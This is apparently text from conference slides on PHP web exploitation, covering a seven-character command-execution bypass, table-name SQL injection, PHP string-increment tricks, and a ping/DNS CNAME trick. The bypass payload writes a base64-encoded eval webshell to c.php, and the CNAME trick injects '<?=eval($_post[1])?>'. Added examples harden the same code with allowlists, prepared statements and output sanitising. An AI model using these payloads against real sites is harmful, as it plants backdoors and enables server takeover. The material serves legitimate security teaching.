... a binary vulnerability exploit. In that vulnerability we can control an 8-byte string, but it must end with "\0". I wrote a simple example of the same constraint using PHP:

    <?php
    $param = $_REQUEST['param'];
    if (strlen($param) < 8) {
        echo shell_exec($param);
    }
    o \
    PD9\
    waH\
    AgZ\
    XZh\
    bCg\
    kX0\
    dFV\
    Fsx\
    XSk\
    7|\
    bas\
    e64\
    -\
    d>\
    c.p\
    hp

    www:~$ echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d> c.php

▪ w: the shortest command in Linux
▪ ls -t: list the directory sorted by modification time
▪ A [\n] between every two filenames
▪ [\] quotes the [\n] after the filename
▪ So [\n] does not influence command execution
▪ Arbitrary command execution vulnerability
... but we cannot comment out the rest of the SQL statement (because of the line feed).

    <?php
    $sql = "UPDATE `{$table}` SET `username`='admin' WHERE id=1";
    mysqli_query($link, $sql);
▪ [-- ] One-line comment: a double dash followed by a whitespace
▪ [/*...*/] Multi-line comment
▪ [`] Under some conditions, ` behaves similarly to a comment
  ▫ MySQL @@version <= 5.5
  ▫ Reference: https://goo.gl/633Ej7
▪ [;] When execution of multiple SQL statements is supported
  ▫ PDO ✔
  ▫ Mysql ✘
  ▫ Mysqli ✘
    SET col_name1={expr1|DEFAULT} [, col_name2={expr2|DEFAULT}] ...
    [WHERE where_condition]
    [ORDER BY ...]
    [LIMIT row_count]

Which statements can be put in the "table_reference" position?
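As an added example that is not part of the original slides, the UPDATE above hardened on the defender's side. A table name cannot be passed as a bound parameter, so the `{$table}` position is checked against an allowlist of known identifiers before it is quoted, and the values are bound through a mysqli prepared statement instead of being interpolated. The table names, function names and the sample inputs are constructed for illustration.

```php
<?php
// Added example (not from the slides): hardening the UPDATE with an
// attacker-influenced table name. Identifiers cannot be bound as
// parameters, so they are allowlisted; values are bound.

/** Tables this code is allowed to touch (hypothetical names). */
const ALLOWED_TABLES = ['users', 'admins'];

/** Quote a MySQL identifier: wrap in backticks and double any embedded backtick. */
function quote_identifier(string $name): string
{
    return '`' . str_replace('`', '``', $name) . '`';
}

/**
 * Build the UPDATE for a table that passed the allowlist, or throw.
 * Returns the SQL text so it can be inspected without a database.
 */
function build_username_update(string $table): string
{
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('table not allowed: ' . json_encode($table));
    }
    return 'UPDATE ' . quote_identifier($table) . ' SET `username` = ? WHERE `id` = ?';
}

/** Run the update with bound values; $link is an already connected mysqli instance. */
function set_username(mysqli $link, string $table, int $id, string $newName): bool
{
    $stmt = $link->prepare(build_username_update($table));
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $link->error);
    }
    $stmt->bind_param('si', $newName, $id);   // 's' for the name, 'i' for the id
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Constructed inputs: one legitimate table name and one that is not an
// identifier at all. Only the first reaches the query builder's output.
foreach (['users', "users`; SELECT 1"] as $candidate) {
    try {
        echo build_username_update($candidate), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The allowlist is the real control here; `quote_identifier` only protects against a stray backtick in a name that is already trusted and is not a substitute for the check.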
    ... bytes of data.
    64 bytes from 107.191.60.143.vultr.com (107.191.60.143): icmp_seq=1 ttl=64 time=0.033 ms

    --- leavesongs.com ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 0.033/0.033/0.033/0.000 ms

▪ We can control ping's output via a CNAME record!
▪ Idea: set the CNAME record of my domain name to a webshell
    ... data bytes
    64 bytes from 107.191.60.143: icmp_seq=0 ttl=50 time=101.293 ms

    --- <?=eval($_post[1])?>.dddns.leavesongs.com ping statistics ---
    1 packets transmitted, 1 packets received, 0.0% packet loss
    round-trip min/avg/max/stddev = 101.293/101.293/101.293/0.000 ms

dddns.leavesongs.com ⇒ NS record ⇒ my DNS server
aaa.dddns.leavesongs.com ⇒ <?=eval($_post[1])?>.dddns.leavesongs.com ⇒ 107.191.60.143
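As an added example, not from the original slides, a hardened version of the two command-execution cases on this page (the `echo shell_exec($param)` snippet and ping of a user-supplied host). The hostname is validated before it is quoted with escapeshellarg, and ping's output is treated as untrusted data, because the reverse and canonical names it prints come from DNS records that the remote side controls, exactly as the CNAME case above shows. Function names and the sample ping output are constructed; the sample mirrors the slide's output with the PHP tags in the canonical name.

```php
<?php
// Added example (not from the slides): validate the argument, quote it,
// and never trust what the command prints back.

/**
 * Accept only a syntactically valid DNS hostname (RFC 1123 labels):
 * letters, digits and hyphens, no label starting or ending with '-',
 * at most 253 characters overall. Shell metacharacters are rejected
 * by construction, so there is nothing left for escapeshellarg to hide.
 */
function is_valid_hostname(string $host): bool
{
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    $label = '(?!-)[A-Za-z0-9-]{1,63}(?<!-)';
    return preg_match("/^{$label}(?:\\.{$label})*$/", $host) === 1;
}

/**
 * ping output is attacker-influenced data: the PTR and CNAME names it
 * prints are whatever the remote DNS serves, so they may contain "<?php".
 * Keep only the line shapes we expect and HTML-escape them before they
 * reach a browser. Never write this text to a file under the web root.
 */
function sanitize_ping_output(string $raw): string
{
    $kept = [];
    foreach (preg_split('/\R/', $raw) as $line) {
        if (preg_match('/^\d+ bytes from /', $line)
            || preg_match('/^\d+ packets transmitted, /', $line)
            || preg_match('/^(rtt|round-trip) /', $line)) {
            $kept[] = htmlspecialchars($line, ENT_QUOTES, 'UTF-8');
        }
    }
    return implode("\n", $kept);
}

/** Validate, quote, run, sanitise. Throws on an unacceptable hostname. */
function safe_ping(string $host): string
{
    if (!is_valid_hostname($host)) {
        throw new InvalidArgumentException('invalid hostname');
    }
    $raw = shell_exec('ping -c 1 ' . escapeshellarg($host) . ' 2>&1');
    if (!is_string($raw)) {
        $raw = '';
    }
    return sanitize_ping_output($raw);
}

// Constructed sample modelled on the slide: the canonical name carries PHP
// tags. The "PING" and "---" lines are dropped, the rest is escaped.
$sample = "PING <?=eval(\$_post[1])?>.example.invalid (192.0.2.1): 56 data bytes\n"
        . "64 bytes from 192.0.2.1: icmp_seq=0 ttl=50 time=101.293 ms\n"
        . "--- <?=eval(\$_post[1])?>.example.invalid ping statistics ---\n"
        . "1 packets transmitted, 1 packets received, 0.0% packet loss\n";
echo sanitize_ping_output($sample), "\n";
var_dump(is_valid_hostname('aaa.dddns.leavesongs.com'));
var_dump(is_valid_hostname('a; ls -t'));
```

The validator alone would not have stopped the CNAME trick, since `aaa.dddns.leavesongs.com` is a perfectly valid name; the output filter is what keeps the DNS-supplied text from ever being stored or rendered as code.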
C + Perl
  ▫ 'a'++ ⇒ 'b'; 'b'++ ⇒ 'c'; 'c'++ ⇒ 'd'; ...
  ▫ Only alphanumeric characters ([a-zA-Z0-9]) are supported
  ▫ 'z'++ ⇒ 'aa';
▪ Thinking about: could the increment operation help me solve the problem?